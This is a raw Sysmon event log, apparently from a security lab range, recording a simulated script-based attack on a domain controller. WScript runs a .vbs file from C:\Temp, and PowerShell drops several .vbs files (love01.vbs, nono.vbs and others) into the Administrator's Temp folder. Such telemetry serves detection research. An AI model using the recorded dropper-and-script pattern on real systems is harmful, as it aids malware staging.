07:59:19.594{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106237Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.594{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106236Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.594{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106235Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.578{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106234Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.578{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106233Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.563{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106232Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.563{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106231Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.563{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106230Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.563{58E9C193-AE68-615A-C800-00000000FC01}45481000C:\Windows\Explorer.EXE{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\windows.storage.dll+ad62a|C:\Windows\System32\windows.storage.dll+ad3e2|C:\Windows\System32\SHELL32.dll+3f8bd|C:\Windows\System32\SHELL32.dll+3e456|C:\Windows\System32\SHELL32.dll+801d1|C:\Windows\System32\SHELL32.dll+6716e|C:\Windows\System32\SHELL32.dll+18cf2c|C:\Windows\System32\SHELL32.dll+18cc83|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106229Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.577{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=95B2CC3A306C4C1059A53B660096F0A5,SHA256=8B2E206D1F6B510AD73C7541C03F39F9E4DDD7E3D1B9E31F3C8829C64B42E075,IMPHASH=661A40859BC6D47752E9FC5E02C1862C{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x800000000000000082951Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:19.039{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=D7A571562F9B8A50DB4351B7149D8F32,SHA256=F0F3CF03D8BF7BE5DB3ED0F9F9C088A515D3FB215B5CC48FF0E09A152511A9F3,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000106410Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.879{58E9C193-B458-615A-2402-00000000FC01}5420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\HsUCsYfsgsd5Q1.vbs2021-10-04 07:59:20.879 11241100x8000000000000000106409Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.844{58E9C193-B458-615A-2102-00000000FC01}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\love01.vbs2021-10-04 07:59:20.844 11241100x8000000000000000106408Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.837{58E9C193-B458-615A-1B02-00000000FC01}5292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\nono.vbs2021-10-04 07:59:20.836 11241100x8000000000000000106407Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.739{58E9C193-B458-615A-1902-00000000FC01}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\lovefhdfhdf.vbs2021-10-04 07:59:20.739 10341000x8000000000000000106406Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.734{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B458-615A-2402-00000000FC01}5420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106405Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.732{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B458-615A-2402-00000000FC01}5420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106404Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.674{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B458-615A-2102-00000000FC01}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106403Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.665{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B458-615A-2102-00000000FC01}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106402Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.663{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B458-615A-2402-00000000FC01}5420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106401Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.663{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B458-615A-2402-00000000FC01}5420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106400Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.656{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B458-615A-1B02-00000000FC01}5292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106399Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.655{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B458-615A-1B02-00000000FC01}5292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106398Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.655{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F431BCD60A7B95686AABDE4EF528F477,SHA256=EEC6CBD4742A275D97EA10019543553081E69D1558D31BAD30BBAD2E5FF795C6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106397Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.626{58E9C193-AE68-615A-C800-00000000FC01}45485468C:\Windows\Explorer.EXE{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106396Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.626{58E9C193-AE68-615A-C800-00000000FC01}45485468C:\Windows\Explorer.EXE{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106395Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.625{58E9C193-AE68-615A-C800-00000000FC01}45485468C:\Windows\Explorer.EXE{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106394Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.621{58E9C193-AE68-615A-C800-00000000FC01}45485468C:\Windows\Explorer.EXE{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106393Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.621{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106392Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.621{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106391Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.621{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106390Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.619{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6DFF1F3242C9C328B5AA748D91B009F,SHA256=CD2BBBCB6EEAFEE79625ED9113DA8A062AAD5B0CC3B33F5265571FC015B32B5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106389Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.615{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=020EF6C7BCD72257C097CA9618BFCA97,SHA256=A9CFDCE9B5C66C5EB17CF99794D164702A14DDF333C73BF53941B01994A53668,IMPHASH=00000000000000000000000000000000falsetrue 17141700x8000000000000000106388Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:59:20.583{58E9C193-B458-615A-2402-00000000FC01}5420\PSHost.132778079601355849.5420.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x8000000000000000106387Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.582{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B458-615A-2102-00000000FC01}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106386Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 